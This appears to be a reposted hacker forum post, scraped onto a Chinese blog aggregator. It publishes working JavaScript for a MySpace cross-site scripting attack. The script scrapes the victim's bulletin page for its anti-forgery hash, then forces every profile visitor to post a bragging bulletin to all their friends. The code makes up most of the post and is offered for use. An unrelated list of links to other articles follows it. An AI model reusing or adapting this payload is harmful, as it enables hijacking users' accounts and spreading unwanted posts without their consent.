MySpace Exploit found By Smokey & MX
来源:互联网 发布:电脑上看淘宝直播回放 编辑:程序博客网 时间:2024/06/06 03:54
Ok basically what this exploit does, it uses an active XSS vuln to automaticly post a buddy bulletin from whomever views your site. Example
User A visits our site
User A has now sent out a Buddy Bulletin to all his friend with whatever we want it to say
There are many variations of this exploit that you can do, this however is the one I am making public.
Here is your JS code
// MySpace bulletin raper by Smokey // JS File coding based on MX vBulletin worm but modified by Smokey // Force bulletin posting and XSS method found by TrainReq & Smokey & MX //Defines what cookie we are looking for var cookie = document.cookie; var checkcok = cookie.match(/posted/); //Defines how the get request is going to work when we grab the hash value function getNewHttpObject() { var objType = false; try { objType = new ActiveXObject('Msxml2.XMLHTTP'); } catch(e) { try { objType = new ActiveXObject('Microsoft.XMLHTTP'); } catch(e) { objType = new XMLHttpRequest(); } } return objType; } function getAXAH(url){ var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET", url); theHttpRequest.send(false); function processAXAH(){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { var str = theHttpRequest.responseText; //finds the hash var hash = str.match(/&hash=([^"]+)&My/); //Defines subject and body var subject = 'Smokey & Kristi are the best!'; var body = '%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cfont+size%3D%225%22+color%3D%22red%22%3E+Smokey+has+owned+my+account%21%21%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E%3Cfont+size%3
D%223%22%3ESup+MySpace%21++I+have+once+again+found+an+epic+sploit%21+I+am+master+of+MySpace%2C+and+no+one+forget+that%21+I+want+everyone+to+ph3ar+mi+u
b3r+l33t+h4x%21%2111%21%21%21%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E+I+am+not+bulletin+raping+for+spite%2Fhate+%2C+its+simply+for+the+fuxaround+%26lt%3B
3%3C%2Fcenter%3E%3Cbr%3E%3Cbr%3EKeep+it+nerdy+DG+style%3Cbr%3E-Smokey%3Cbr%3E+I+love+Kristi+Lee%21' //If user hasn't already posted set a cookie and post if (checkcok == null){ document.cookie = "posted=true; path=/;domain=.myspace.com;"; // Posts all the information postAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin.confirmation&mode=5&groupID=0&userID=-1&authorID=0&messageID=0&commentID=0&commentAuthorID=0', 'groupID=0&hashcode=' + hash[1] + '&hash=' + hash[1] + '&subject='+ subject +'&body='+ body +'&allowBulletinComments=1&mode=0'); } } } } } //Gets information off of the bulletin space function postAXAH(url, params) { var theHttpRequest = getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST", url); theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params); function processAXAHr(elementContainer){ if (theHttpRequest.readyState == 4) { if (theHttpRequest.status == 200) { } } } } getAXAH('http://' + document.location.host + '/index.cfm?fuseaction=bulletin');
- MySpace Exploit found By Smokey & MX
- exploit
- exploit
- Exploit
- Exploit
- mx
- Hacking MySpace
- Hacking MySpace
- MS Windows Workstation Service NetrWkstaUserEnum() 0day Memory Allocation Remote DoS Exploit # Bug discovered by h07
- Linux (x86) Exploit 开发系列教程之十一 Off-By-One 漏洞(基于堆)
- 基于AS3 和 Director Mx 2004 多点触摸测试 By 模拟器
- VBS.Exploit
- ani exploit
- 什么是exploit
- ms08069 exploit
- exploit search
- 什么是exploit
- explore exploit
- THE LONG TAIL--尾巴上的火把
- 工作了 该如何生活
- DnD
- 安装OpenCV
- Unlimited Rapidshare Downloads
- MySpace Exploit found By Smokey & MX
- 由内到外设计----带给用户真正的价值
- 遇上携手网,仿如梅兰芳走上了属于他的戏台
- 堆排序(java)
- Linux local root
- JAVA在线自测题系统,测试版上线,欢迎测试和提供题目
- 中国预警机战略发展趋势及对世界的影响
- Windows XP pro IIS连接数的问题
- 嵌入式开发的模式及流程